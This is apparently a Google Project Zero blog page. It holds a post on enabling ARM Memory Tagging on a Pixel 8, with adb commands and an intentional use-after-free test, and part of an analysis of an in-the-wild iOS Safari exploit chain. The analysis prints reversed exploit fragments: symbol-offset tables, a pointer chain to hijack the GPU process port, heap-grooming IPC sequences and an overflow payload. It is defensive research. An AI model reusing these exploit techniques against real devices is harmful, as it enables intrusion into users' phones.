
First handset with MTE on the market

3 November 2023 at 17:04

By Mark Brand, Google Project Zero

Introduction

It's finally time for me to fulfill a long-standing promise. Since I first heard about ARM's Memory Tagging Extensions, I've said (to far too many people at this point to be able to back out…) that I'd immediately switch to the first available device that supported this feature. It's been a long wait (since late 2017) but with the release of the new Pixel 8 / Pixel 8 Pro handsets, there's finally a production handset that allows you to enable MTE!

The ability of MTE to detect memory corruption exploitation at the first dangerous access is a significant improvement in diagnostic and potential security effectiveness. The availability of MTE on a production handset for the first time is a big step forward, and I think there's real potential to use this technology to make 0-day exploitation harder.

I've been running my Pixel 8 with MTE enabled since release day, and so far I haven't found any issues with any of the applications I use on a daily basis[1], or any noticeable performance issues.

Currently, MTE is only available on the Pixel as a developer option, intended for app developers to test their apps using MTE, but we can configure it to default to synchronous mode for all[2] apps and native user mode binaries. This can be done on a stock image, without bootloader unlocking or rooting required - just a couple of debugger commands. We'll do that now, but first:

Disclaimer

This is absolutely not a supported device configuration; and it's highly likely that you'll encounter issues with at least some applications crashing or failing to run correctly with MTE if you set your device up in this way. 

This is how I've configured my personal Pixel 8, and so far I've not experienced any issues, but this was somewhat of a surprise to me, and I'm still waiting to see what the first app that simply won't work at all will be...

Enabling MTE on Pixel 8/Pixel 8 Pro

Enabling MTE on an Android device requires the bootloader to reserve a portion of the device memory for storing tags. This means that there are two separate places where MTE needs to be enabled - first we need to configure the bootloader to enable it, and then we need to configure the system to use it in applications.

First we need to follow the Android instructions to enable developer mode and USB debugging on the device:

Now we need to connect our phone to a trusted computer that has the Android debugging tools installed on it - I'm using my linux workstation:

markbrand@markbrand$ adb devices -l

List of devices attached

XXXXXXXXXXXXXX         device usb:3-3 product:shiba model:Pixel_8 device:shiba transport_id:5

markbrand@markbrand$ adb shell

shiba:/ $ setprop arm64.memtag.bootctl memtag

shiba:/ $ setprop persist.arm64.memtag.default sync

shiba:/ $ setprop persist.arm64.memtag.app_default sync

shiba:/ $ reboot

These commands are doing three things: the first configures the bootloader to enable MTE at boot. The second sets the default MTE mode for native executables running on the device, and the third sets the default MTE mode for apps. An app developer can enable MTE using the app manifest, but this system property sets the default MTE mode for apps, effectively making MTE opt-out instead of opt-in.

While on the topic of apps opting-out, it's worth noting that Chrome doesn't use the system allocator for most allocations, and instead uses PartitionAlloc. There is experimental MTE support under development, which can be enabled with some additional steps[3]. Unfortunately this currently requires setting a command-line flag which involves some security tradeoffs. We expect that Chrome will add an easier way to enable MTE support without these problems in the near future.

If we look at all of the system properties, we can see that there are a few additional properties that are related to memory tagging:

shiba:/ $ getprop | grep memtag

[arm64.memtag.bootctl]: [memtag]

[persist.arm64.memtag.app.com.android.nfc]: [off]

[persist.arm64.memtag.app.com.android.se]: [off]

[persist.arm64.memtag.app.com.google.android.bluetooth]: [off]

[persist.arm64.memtag.app_default]: [sync]

[persist.arm64.memtag.default]: [sync]

[persist.arm64.memtag.system_server]: [off]

[ro.arm64.memtag.bootctl_supported]: [1]

There are unfortunately some default exclusions which we can't override: the protections on system properties mean that we can't currently enable MTE for a few components in a normal production build. These exceptions are system_server and the applications related to NFC, the secure element and Bluetooth.

We want to make sure that these commands worked, so we'll verify that now, first checking whether MTE is enabled for native executables:

shiba:/ $ cat /proc/self/smaps | grep mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

765bff1000-765c011000 r--s 00000000 00:12 97                             /dev/__properties__/u:object_r:arm64_memtag_prop:s0

We can see that our cat process has mappings with the mt bit set, so MTE has been enabled for the process.
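If you want to check from inside your own native code, here's a minimal sketch (my own, not part of the original post) that queries the same per-process MTE state shown later in the crash dump's tagged_addr_ctrl line:

#include <sys/prctl.h>
#include <cstdio>

#ifndef PR_GET_TAGGED_ADDR_CTRL
#define PR_GET_TAGGED_ADDR_CTRL 56
#endif
#ifndef PR_MTE_TCF_SYNC
#define PR_MTE_TCF_SYNC  (1UL << 1)
#define PR_MTE_TCF_ASYNC (1UL << 2)
#endif

int main() {
    // Read the tagged-address control word for the current process.
    int ctrl = prctl(PR_GET_TAGGED_ADDR_CTRL, 0, 0, 0, 0);
    if (ctrl < 0) { perror("prctl"); return 1; }
    if (ctrl & PR_MTE_TCF_SYNC)       printf("MTE tag checking: sync\n");
    else if (ctrl & PR_MTE_TCF_ASYNC) printf("MTE tag checking: async\n");
    else                              printf("MTE tag checking: off\n");
    return 0;
}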

Now, in order to check that an app without any manifest setting has picked up this default, we add a little bit of code to an empty JNI project to trigger a use-after-free bug:

extern "C" JNIEXPORT jstring JNICALL

Java_com_example_mtetestapplication_MainActivity_stringFromJNI(

        JNIEnv* env,

        jobject /* this */) {

    char* ptr = strdup("test string");

  free(ptr);

  // Use-after-free when ptr is accessed below.

    return env->NewStringUTF(ptr);

}

Without MTE, it's unlikely that the application would crash running this code. I also made sure that the application manifest does not set MTE, so it will inherit the default. When we launch the application we will see whether it crashes, and whether the crash is caused by an MTE check failure!

Looking at the logcat output we can see that the cause of the crash was a synchronous MTE tag check failure (SEGV_MTESERR).

DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***

DEBUG   : Build fingerprint: 'google/shiba/shiba:14/UD1A.230803.041/10808477:user/release-keys'

DEBUG   : Revision: 'MP1.0'

DEBUG   : ABI: 'arm64'

DEBUG   : Timestamp: 2023-10-24 16:56:32.092532886+0200

DEBUG   : Process uptime: 2s

DEBUG   : Cmdline: com.example.mtetestapplication

DEBUG   : pid: 24147, tid: 24147, name: testapplication  >>> com.example.mtetestapplication <<<

DEBUG   : uid: 10292

DEBUG   : tagged_addr_ctrl: 000000000007fff3 (PR_TAGGED_ADDR_ENABLE, PR_MTE_TCF_SYNC, mask 0xfffe)

DEBUG   : pac_enabled_keys: 000000000000000f (PR_PAC_APIAKEY, PR_PAC_APIBKEY, PR_PAC_APDAKEY, PR_PAC_APDBKEY)

DEBUG   : signal 11 (SIGSEGV), code 9 (SEGV_MTESERR), fault addr 0x0b000072afa9f790

DEBUG   :     x0  0000000000000001  x1  0000007fe384c2e0  x2  0000000000000075  x3  00000072aae969ac

DEBUG   :     x4  0000007fe384c308  x5  0000000000000004  x6  7274732074736574  x7  00676e6972747320

DEBUG   :     x8  0000000000000020  x9  00000072ab1867e0  x10 000000000000050c  x11 00000072aaed0af4

DEBUG   :     x12 00000072aaed0ca8  x13 31106e3dee7fb177  x14 ffffffffffffffff  x15 00000000ebad6a89

DEBUG   :     x16 0000000000000001  x17 000000722ff047b8  x18 00000075740fe000  x19 0000007fe384c2d0

DEBUG   :     x20 0000007fe384c308  x21 00000072aae969ac  x22 0000007fe384c2e0  x23 070000741fa897b0

DEBUG   :     x24 0b000072afa9f790  x25 00000072aaed0c18  x26 0000000000000001  x27 000000754a5fae40

DEBUG   :     x28 0000007573c00000  x29 0000007fe384c260

DEBUG   :     lr  00000072ab35e7ac  sp  0000007fe384be30  pc  00000072ab1867ec  pst 0000000080001000

DEBUG   : 98 total frames

DEBUG   : backtrace:

DEBUG   :       #00 pc 00000000003867ec  /apex/com.android.art/lib64/libart.so (art::(anonymous namespace)::ScopedCheck::Check(art::ScopedObjectAccess&, bool, char const*, art::(anonymous namespace)::JniValueType*) (.__uniq.99033978352804627313491551960229047428)+1636) (BuildId: a5fcf27f4a71b07dff05c648ad58e3cd)

DEBUG   :       #01 pc 000000000055e7a8  /apex/com.android.art/lib64/libart.so (art::(anonymous namespace)::CheckJNI::NewStringUTF(_JNIEnv*, char const*) (.__uniq.99033978352804627313491551960229047428.llvm.6178811259984417487)+160) (BuildId: a5fcf27f4a71b07dff05c648ad58e3cd)

DEBUG   :       #02 pc 00000000000017dc  /data/app/~~lgGoAt3gB6oojf3IWXi-KQ==/com.example.mtetestapplication-k4Yl4oMx9PEbfuvTEkjqFg==/base.apk!libmtetestapplication.so (offset 0x1000) (_JNIEnv::NewStringUTF(char const*)+36) (BuildId: f60a9970a8a46ff7949a5c8e41d0ece51e47d82c)

...

DEBUG   : Note: multiple potential causes for this crash were detected, listing them in decreasing order of likelihood.

DEBUG   : Cause: [MTE]: Use After Free, 0 bytes into a 12-byte allocation at 0x72afa9f790

DEBUG   : deallocated by thread 24147:

DEBUG   :       #00 pc 000000000005e800  /apex/com.android.runtime/lib64/bionic/libc.so (scudo::Allocator<scudo::AndroidConfig, &(scudo_malloc_postinit)>::quarantineOrDeallocateChunk(scudo::Options, void*, scudo::Chunk::UnpackedHeader*, unsigned long)+496) (BuildId: a017f07431ff6692304a0cae225962fb)

DEBUG   :       #01 pc 0000000000057ba4  /apex/com.android.runtime/lib64/bionic/libc.so (scudo::Allocator<scudo::AndroidConfig, &(scudo_malloc_postinit)>::deallocate(void*, scudo::Chunk::Origin, unsigned long, unsigned long)+212) (BuildId: a017f07431ff6692304a0cae225962fb)

DEBUG   :       #02 pc 000000000000179c  /data/app/~~lgGoAt3gB6oojf3IWXi-KQ==/com.example.mtetestapplication-k4Yl4oMx9PEbfuvTEkjqFg==/base.apk!libmtetestapplication.so (offset 0x1000) (Java_com_example_mtetestapplication_MainActivity_stringFromJNI+40) (BuildId: f60a9970a8a46ff7949a5c8e41d0ece51e47d82c)

If you just want to check that MTE has been enabled in the bootloader, there's an application on the Play Store from Google's Dynamic Tools team which you can also use (this app enables MTE in async mode in its manifest, which is why it reports that MTE is not running in sync mode on all cores).

At this point, we can go back into the developer settings and disable USB debugging, since we don't want that enabled for normal day-to-day usage. We do need to leave the developer mode toggle on, since disabling that will turn off MTE again entirely on the next reboot.


Conclusion

The Pixel 8 with synchronous-MTE enabled is at least subjectively a performance and battery-life upgrade over my previous phone.

I think this is a huge improvement for the general security of the device - many zero-click attack surfaces involve large amounts of unsafe C/C++ code, whether that's WebRTC for calling, or one of the many media or image file parsing libraries. MTE is not a silver bullet for memory safety - but the release of the first production device with the ability to run almost all user-mode applications with synchronous-MTE is a huge step forward, and something that's worth celebrating!

[1] On a team member's device, a single MTE detection of a use-after-free bug happened last week. This resulted in a crash that wasn't noticed at the time, but which we later found when looking through the saved crash reports on their device. Because the alloc and free stacktraces of the allocation were recorded, we were able to quickly figure out the bug and report it to the application developers - the bug in this case was caused by user gesture input, and doesn't really have security impact, but it already illustrates some of the advantages of MTE.

[2] Except for se (secure element), bluetooth, nfc, and the system server, due to these system apps explicitly setting their individual system properties to 'off' in the Pixel system image.

[3] Enabling MTE in Chrome requires setting multiple command-line flags, which on a non-rooted Android device requires configuring Chrome to load the command line flags from a file in /data/local/tmp. This is potentially unsafe, so we don't suggest doing this, but if you'd like to experiment on a test device or for fuzzing, the following commands will allow you to run Chrome with MTE enabled:

markbrand@markbrand:~$ adb shell

shiba:/ $ umask 022

shiba:/ $ echo "_ --enable-features=PartitionAllocMemoryTagging:enabled-processes/all-processes/memtag-mode/sync --disable-features=PartitionAllocPermissiveMte,KillPartitionAllocMemoryTagging" > /data/local/tmp/chrome-command-line

shiba:/ $ ls -la /data/local/tmp/chrome-command-line

-rw-r--r-- 1 shell shell 176 2023-10-25 19:14 /data/local/tmp/chrome-command-line


Having run these commands, we need to configure Chrome to read the command line file; this can be done by opening Chrome, browsing to chrome://flags#enable-command-line-on-non-rooted-devices, and setting the highlighted flag to "Enabled".

Note that unfortunately this only applies to webpages viewed using the Chrome app, and not to other Chromium-based browsers or to non-browser apps that use the Chromium-based Android WebView to implement their rendering.

An analysis of an in-the-wild iOS Safari WebContent to GPU Process exploit

13 October 2023 at 10:47

By Ian Beer

A graph representation of the sandbox escape NSExpression payload, rendered as a node graph with an eerie similarity to a human eye

In April this year Google's Threat Analysis Group, in collaboration with Amnesty International, discovered an in-the-wild iPhone zero-day exploit chain being used in targeted attacks delivered via a malicious link. The chain was reported to Apple under a 7-day disclosure deadline and Apple released iOS 16.4.1 on April 7, 2023, fixing CVE-2023-28206 and CVE-2023-28205.

Over the last few years Apple has been hardening the Safari WebContent (or "renderer") process sandbox attack surface on iOS, recently removing the ability for the WebContent process to access GPU-related hardware directly. Access to graphics-related drivers is now brokered via a GPU process which runs in a separate sandbox.

Analysis of this in-the-wild exploit chain reveals the first known case of attackers exploiting the Safari IPC layer to "hop" from WebContent to the GPU process, adding an extra link to the exploit chain (CVE-2023-32409).

On the surface this is a positive sign: clear evidence that the renderer sandbox was hardened sufficiently that (in this isolated case at least) the attackers needed to bundle an additional, separate exploit. Project Zero has long advocated for attack-surface reduction as an effective tool for improving security and this would seem like a clear win for that approach.

On the other hand, upon deeper inspection, things aren't quite so rosy. Retroactively sandboxing code which was never designed with compartmentalization in mind is rarely simple to do effectively. In this case the exploit targeted a very basic buffer overflow vulnerability in unused IPC support code for a disabled feature - effectively new attack surface which exists only because of the introduced sandbox. A simple fuzzer targeting the IPC layer would likely have found this vulnerability in seconds.

Nevertheless, it remains the case that attackers will still need to exploit this extra link in the chain each time to reach the GPU driver kernel attack surface. A large part of this writeup is dedicated to analysis of the NSExpression-based framework the attackers developed to ease this and vastly reduce their marginal costs.

Setting the stage

After gaining native code execution by exploiting a JavaScriptCore Garbage Collection vulnerability, the attackers perform a find-and-replace on a large ArrayBuffer in JavaScript containing a Mach-O binary to link a number of platform- and version-dependent symbol addresses and structure offsets using hardcoded values:

// find and rebase symbols for current target and ASLR slide:

    dt: {

        ce: false,

        ["16.3.0"]: {

            _e: 0x1ddc50ed1,

            de: 0x1dd2d05b8,

            ue: 0x19afa9760,

            he: 1392,

            me: 48,

            fe: 136,

            pe: 0x1dd448e70,

            ge: 305,

            Ce: 0x1dd2da340,

            Pe: 0x1dd2da348,

            ye: 0x1dd2d45f0,

            be: 0x1da613438,

...

        ["16.3.1"]: {

            _e: 0x1ddc50ed1,

            de: 0x1dd2d05b8,

            ue: 0x19afa9760,

            he: 1392,

            me: 48,

            fe: 136,

            pe: 0x1dd448e70,

            ge: 305,

            Ce: 0x1dd2da340,

            Pe: 0x1dd2da348,

            ye: 0x1dd2d45f0,

            be: 0x1da613438,

// mach-o Uint32Array:

xxxx = new Uint32Array([0x77a9d075,0x88442ab6,0x9442ab8,0x89442ab8,0x89442aab,0x89442fa2,

// deobfuscate xxx

...

// find-and-replace symbols:

xxxx.on(new m("0x2222222222222222"), p.Le);

xxxx.on(new m("0x3333333333333333"), Gs);

xxxx.on(new m("0x9999999999999999"), Bs);

xxxx.on(new m("0x8888888888888888"), Rs);

xxxx.on(new m("0xaaaaaaaaaaaaaaaa"), Is);

xxxx.on(new m("0xc1c1c1c1c1c1c1c1"), vt);

xxxx.on(new m("0xdddddddddddddddd"), p.Xt);

xxxx.on(new m("0xd1d1d1d1d1d1d1d1"), p.Jt);

xxxx.on(new m("0xd2d2d2d2d2d2d2d2"), p.Ht);

The initial Mach-O which this loads has a fairly small __TEXT (code) segment and is itself in fact a Mach-O loader, which loads another binary from a segment called __embd. It's this inner Mach-O which this analysis will cover.

Part I - Mysterious Messages

Looking through the strings in the binary there's a collection of familiar IOKit userclient matching strings referencing graphics drivers:

"AppleM2ScalerCSCDriver",0

"IOSurfaceRoot",0

"AGXAccelerator",0

But following the cross references to "AGXAccelerator" (which opens userclients for the GPU) this string never gets passed to IOServiceOpen. Instead, all references to it end up here (the binary is stripped so all function names are my own):

kern_return_t

get_a_user_client(char *matching_string,

                  u32 type,

                  void* s_out) {

  kern_return_t ret;

  struct uc_reply_msg;

  mach_port_name_t reply_port;

  struct msg_1 msg;

  reply_port = 0;

  mach_port_allocate(mach_task_self_,

                     MACH_PORT_RIGHT_RECEIVE,

                     &reply_port);

  memset(&msg, 0, sizeof(msg));

  msg.hdr.msgh_bits = 0x1413;

  msg.hdr.msgh_remote_port = a_global_port;

  msg.hdr.msgh_local_port = reply_port;

  msg.hdr.msgh_id = 5;

  msg.hdr.msgh_size = 200;

  msg.field_a = 0;

  msg.type = type;

  __strcpy_chk(msg.matching_str, matching_string, 128LL);

  ret = mach_msg_send(&msg.hdr);

...

  // return a port read from the reply message via s_out

Whilst it's not unusual for a userclient matching string to end up inside a mach message (plenty of exploits will include or generate their own MIG serialization code for interacting with IOKit) this isn't a MIG message.

Trying to track down the origin of the port right to which this message was sent was non-trivial; there was clearly more going on. My guess was that this must be communicating with something else, likely some other part of the exploit. The question was: what other part?

Down the rabbit hole

At this point I started going through all the cross-references to the imported symbols which could send or receive mach messages, hoping to find the other end of this IPC. This just raised more questions than it answered.

In particular, there were a lot of cross-references to a function sending a variable-sized mach message with a msgh_id of 0xDBA1DBA.

There is exactly one hit on Google for that constant:

A screenshot of a Google search result page with one result

Ignoring Google's helpful advice that maybe I wanted to search for "cake recipes" instead of this hex constant and following the single result leads to this snippet on opensource.apple.com in ConnectionCocoa.mm:

namespace IPC {

static const size_t inlineMessageMaxSize = 4096;

// Arbitrary message IDs that do not collide with Mach notification messages (used my initials).

constexpr mach_msg_id_t inlineBodyMessageID = 0xdba0dba;

constexpr mach_msg_id_t outOfLineBodyMessageID = 0xdba1dba;

This is a constant used in Safari IPC messages!

Whilst Safari has had a separate networking process for a long time it's only recently started to isolate GPU and graphics-related functionality into a GPU process. Knowing this, it's fairly clear what must be going on here: since the renderer process can presumably no longer open the AGXAccelerator userclients, the exploit is somehow going to have to get the GPU process to do that. This is likely the first case of an in-the-wild iOS exploit targeting Safari's IPC layer.

The path less trodden

Googling for info on Safari IPC doesn't yield many results (apart from some very early Project Zero vulnerability reports) and looking through the WebKit source reveals heavy use of generated code and C++ operator overloading, neither of which are conducive to quickly getting a feel for the binary-level structure of the IPC messages.

But the high-level structure is easy enough to figure out. As we can see from the code snippet above, IPC messages containing the msgh_id value 0xdba1dba send their serialized message body as an out-of-line descriptor. That serialized body always starts with a common header defined in the IPC namespace as:

void Encoder::encodeHeader()

{

  *this << defaultMessageFlags;

  *this << m_messageName;

  *this << m_destinationID;

}

The flags and name fields are both 16-bit values and destinationID is 64 bits. The serialization uses natural alignment so there's 4 bytes of padding between the name and destinationID:

Diagram showing the in-memory layout of a Safari IPC mach message with message header then serialized payload pointed to by an out-of-line descriptor
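Putting that together, the serialized header is 16 bytes with a layout something like this (a sketch reconstructed from the snippet above; the struct and field names are mine):

#include <cstdint>

struct SerializedIPCHeader {
    uint16_t flags;          // defaultMessageFlags
    uint16_t messageName;    // m_messageName, a 16-bit message name
    uint32_t padding;        // natural-alignment padding
    uint64_t destinationID;  // m_destinationID
};
static_assert(sizeof(SerializedIPCHeader) == 16, "header is 16 bytes");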

It's easy enough to enumerate all the functions in the exploit which serialize these Safari IPC messages. None of them hardcode the messageName values; instead there's a layer of indirection indicating that the messageName values aren't stable across builds. The exploit uses the device's uname string, product and OS version to choose the correct hardcoded table of messageName values.

The IPC::description function in the iOS shared cache maps messageName values to IPC names:

const char * IPC::description(unsigned int messageName)

{

  if ( messageName > 0xC78 )

    return "<invalid message name>";

  else

    return off_1D61ED988[messageName];

}

The size of the bounds check gives you an idea of the size of the IPC attack surface - that's over 3000 IPC messages between all pairs of communicating processes.

Using the table in the shared cache to map the message names to human-readable strings we can see the exploit uses the following 24 IPC messages:

0x39:  GPUConnectionToWebProcess_CreateRemoteGPU

0x3a:  GPUConnectionToWebProcess_CreateRenderingBackend

0x9B5: InitializeConnection

0x9B7: ProcessOutOfStreamMessage

0xBA2: RemoteAdapter_RequestDevice

0xBA5: RemoteBuffer_MapAsync

0x271: RemoteBuffer_Unmap

0xBA6: RemoteCDMFactoryProxy_CreateCDM

0x2A2: RemoteDevice_CreateBuffer

0x2C7: RemoteDisplayListRecorder_DrawNativeImage

0x2D4: RemoteDisplayListRecorder_FillRect

0x2DF: RemoteDisplayListRecorder_SetCTM

0x2F3: RemoteGPUProxy_WasCreated

0xBAD: RemoteGPU_RequestAdapter

0x402: RemoteMediaRecorderManager_CreateRecorder

0xA85: RemoteMediaRecorderManager_CreateRecorderReply

0x412: RemoteMediaResourceManager_RedirectReceived

0x469: RemoteRenderingBackendProxy_DidInitialize

0x46D: RemoteRenderingBackend_CacheNativeImage

0x46E: RemoteRenderingBackend_CreateImageBuffer

0x474: RemoteRenderingBackend_ReleaseResource

0x9B8: SetStreamDestinationID

0x9B9: SyncMessageReply

0x9BA: Terminate

This list of IPC names solidifies the theory that this exploit is targeting a GPU process vulnerability.

Finding a way

The destination port which these messages are being sent to comes from a global variable which looks like this in the raw Mach-O when loaded into IDA:

__data:000000003E4841C0 dst_port DCQ 0x4444444444444444

I mentioned earlier that the outer JS which loaded the exploit binary first performed a find-and-replace using patterns like this. Here's the snippet computing this particular value:

 let Ls = o(p.Ee);

 let Ds = o(Ls.add(p.qe));

 let Ws = o(Ds.add(p.$e));

 let vs = o(Ws.add(p.Ze));

 jBHk.on(new m("0x4444444444444444"), vs);

Replacing all the constants we can see it's following a pointer chain from a hardcoded offset inside the shared cache:

 let Ls = o(0x1dd453458);

 let Ds = o(Ls.add(256));

 let Ws = o(Ds.add(24));

 let vs = o(Ws.add(280));

At the initial symbol address (0x1dd453458) we find the WebContent process's singleton process object which maintains its state:

WebKit:__common:00000001DD453458 WebKit::WebProcess::singleton(void)::process

Following the offsets, we can see the exploit walks this pointer chain to find the mach port right representing the WebProcess's connection to the GPU process:

process->m_gpuProcessConnection->m_connection->m_sendPort
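Mapping the hardcoded offsets from the earlier JS snippet onto that chain (my annotation; read64 is a hypothetical arbitrary-read helper standing in for the exploit's o()):

uint64_t Ls = read64(0x1dd453458); // WebKit::WebProcess::singleton()::process
uint64_t Ds = read64(Ls + 256);    // process->m_gpuProcessConnection
uint64_t Ws = read64(Ds + 24);     // ->m_connection
uint64_t vs = read64(Ws + 280);    // ->m_sendPort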

The exploit also reads the m_receivePort field allowing it to set up bidirectional communication with the GPU process and fully imitate the WebContent process.

Defining features

WebKit defines its IPC messages using a simple custom DSL in files ending with the suffix .messages.in. These definitions look like this:

messages -> RemoteRenderPipeline NotRefCounted Stream {

  void GetBindGroupLayout(uint32_t index, WebKit::WebGPUIdentifier identifier);

  void SetLabel(String label)

}

These are parsed by this python script to generate the necessary boilerplate code to handle serializing and deserializing the messages. Types which wish to cross the serialization boundary define ::encode and ::decode methods:

void encode(IPC::Encoder&) const;

static WARN_UNUSED_RETURN bool decode(IPC::Decoder&, T&);

There are a number of macros defining these coders for the built-in types.
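For a simple custom type, the coder pair looks something like this (a hedged sketch based on the declarations above, not copied from WebKit):

struct SketchIdentifier {
    uint64_t value { 0 };

    void encode(IPC::Encoder& encoder) const
    {
        encoder << value; // serialized with natural alignment
    }

    static bool decode(IPC::Decoder& decoder, SketchIdentifier& result)
    {
        return decoder.decode(result.value); // false on malformed input
    }
};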

A pattern appears

After renaming the methods in the exploit which send IPC messages and reversing some more of their arguments, a clear pattern emerges:

image_buffer_base_id = rand();

for (i = 0; i < 34; i++) {

  IPC_RemoteRenderingBackend_CreateImageBuffer(

    image_buffer_base_id + i);

}

semaphore_signal(semaphore_b);

remote_device_buffer_id_base = rand();

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 2);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 4);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 1);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 6);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 2);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 8);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 3);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 10);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 4);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 12);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 5);

usleep(4000u);

semaphore_signal(semaphore_b);

This creates 34 RemoteRenderingBackend ImageBuffer objects then releases 6 of them and likely reallocates the holes via the RemoteDevice::CreateBuffer IPC (passing a size of 16k.)

Diagram showing a pattern of alternating allocations

This looks a lot like heap manipulation to place certain objects next to each other in preparation for a buffer overflow. The part which is slightly odd is how simple it seems - there's no evidence of a complex heap-grooming approach here. The diagram above was just my guess at what was probably happening, and reading through the code implementing the IPCs it was not at all obvious where these buffers were actually being allocated.

A strange argument

I started to reverse engineer the structure of the IPC messages which looked most relevant, looking for anything which seemed out of place. One pair of messages seemed especially suspicious:

RemoteBuffer::MapAsync

RemoteBuffer::Unmap

These are two messages sent from the Web process to the GPU process, defined in GPUProcess/graphics/WebGPU/RemoteBuffer.messages.in and used in the WebGPU implementation.

Whilst the IPC machinery implementing WebGPU exists in Safari, the user-facing JavaScript API isn't present. It used to be available in Apple's Safari Technology Preview builds, but it hasn't been enabled there for some time. The W3C WebGPU group's github wiki suggests that when enabling WebGPU support in Safari users should "avoid leaving it enabled when browsing the untrusted web."

The IPC definitions for the RemoteBuffer look like this:

messages -> RemoteBuffer NotRefCounted Stream

{

  void MapAsync(PAL::WebGPU::MapModeFlags mapModeFlags,

                PAL::WebGPU::Size64 offset,

                std::optional<PAL::WebGPU::Size64> size)

        ->

        (std::optional<Vector<uint8_t>> data) Synchronous

    void Unmap(Vector<uint8_t> data)

}

These WebGPU resources explain the concepts behind these APIs. They're intended to manage sharing buffers between the GPU and CPU:

MapAsync moves ownership of a buffer from the GPU to the CPU to allow the CPU to manipulate it without racing the GPU.

Unmap then signals that the CPU is done with the buffer and ownership can return to the GPU.

In practice the MapAsync IPC returns a copy of the current contents of the WebGPU buffer (at the specified offset) to the CPU as a Vector<uint8_t>. Unmap then passes the new contents back to the GPU, also as a Vector<uint8_t>.

You might be able to see where this is going...

Buffer lifecycles

RemoteBuffers are created on the WebContent side using the RemoteDevice::CreateBuffer IPC:

messages -> RemoteDevice NotRefCounted Stream {

  void Destroy()

  void CreateBuffer(WebKit::WebGPU::BufferDescriptor descriptor,

                    WebKit::WebGPUIdentifier identifier)

This takes a description of the buffer to create and an identifier to name it. All the calls to this IPC in the exploit used a fixed size of 0x4000 which is 16KB, the size of a single physical page on iOS.

The first sign that these IPCs were important was the rather strange arguments passed to MapAsync in some places:

IPC_RemoteBuffer_MapAsync(remote_device_buffer_id_base + m,

                          0x4000,

                          0);

As shown above, this IPC takes a buffer id, an offset and a size to map - in that order. So this IPC call is requesting a mapping of the buffer with id remote_device_buffer_id_base + m at offset 0x4000 (the very end), with size 0 (i.e. nothing).

Directly after this they call IPC_RemoteBuffer_Unmap passing a vector of 40 bytes as the "new content":

b[0] = 0x7F6F3229LL;

b[1] = 0LL;

b[2] = 0LL;

b[3] = 0xFFFFLL;

b[4] = arg_val;

return IPC_RemoteBuffer_Unmap(dst, b, 40LL);

Buffer origins

I spent a considerable amount of time trying to figure out the origin of the underlying pages backing the RemoteBuffer allocations. Statically following the code from WebKit you eventually end up in the userspace side of the AGX GPU family drivers, which are written in Objective-C. There are plenty of methods with names like

id __cdecl -[AGXG15FamilyDevice newBufferWithLength:options:]

implying responsibility for buffer allocations - but there's no malloc, mmap or vm_allocate in sight.

Using dtrace to dump userspace and kernel stack traces while experimenting with code using the GPU on an M1 MacBook, I eventually figured out that this buffer is allocated by the GPU driver itself, which then maps that memory into userspace:

IOMemoryDescriptor::createMappingInTask

IOBufferMemoryDescriptor::initWithPhysicalMask

com.apple.AGXG13X`AGXAccelerator::

                    createBufferMemoryDescriptorInTaskWithOptions

com.apple.iokit.IOGPUFamily`IOGPUSysMemory::withOptions

com.apple.iokit.IOGPUFamily`IOGPUResource::newResourceWithOptions

com.apple.iokit.IOGPUFamily`IOGPUDevice::new_resource

com.apple.iokit.IOGPUFamily`IOGPUDeviceUserClient::s_new_resource

kernel.release.t6000`0xfffffe00263116cc+0x80

kernel.release.t6000`0xfffffe00263117bc+0x28c

kernel.release.t6000`0xfffffe0025d326d0+0x184

kernel.release.t6000`0xfffffe0025c3856c+0x384

kernel.release.t6000`0xfffffe0025c0e274+0x2c0

kernel.release.t6000`0xfffffe0025c25a64+0x1a4

kernel.release.t6000`0xfffffe0025c25e80+0x200

kernel.release.t6000`0xfffffe0025d584a0+0x184

kernel.release.t6000`0xfffffe0025d62e08+0x5b8

kernel.release.t6000`0xfffffe0025be37d0+0x28

--- kernel stack above | userspace stack below ---

libsystem_kernel.dylib`mach_msg2_trap

IOKit`io_connect_method

IOKit`IOConnectCallMethod

IOGPU`IOGPUResourceCreate

IOGPU`-[IOGPUMetalResource initWithDevice:

          remoteStorageResource:

          options:

          args:

          argsSize:]

IOGPU`-[IOGPUMetalBuffer initWithDevice:

          pointer:

          length:

          alignment:

          options:

          sysMemSize:

          gpuAddress:

          args:

          argsSize:

          deallocator:]

AGXMetalG13X`-[AGXBuffer(Internal) initWithDevice:

                 length:

                 alignment:

                 options:

                 isSuballocDisabled:

                 resourceInArgs:

                 pinnedGPULocation:]

AGXMetalG13X`-[AGXBuffer initWithDevice:

                           length:

                           alignment:

                           options:

                           isSuballocDisabled:

                           pinnedGPULocation:]

AGXMetalG13X`-[AGXG13XFamilyDevice newBufferWithDescriptor:]

IOGPU`IOGPUMetalSuballocatorAllocate

The algorithm which IOMemoryDescriptor::createMappingInTask will use to find space in the task virtual memory is identical to that used by vm_allocate, which starts to explain why the "heap groom" seen earlier is so simple, as vm_allocate uses a simple bottom-up first fit algorithm.
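You can see that first-fit behaviour in isolation with a few lines of code (my own illustration, runnable on macOS, unrelated to the exploit itself):

#include <mach/mach.h>
#include <cstdio>

int main() {
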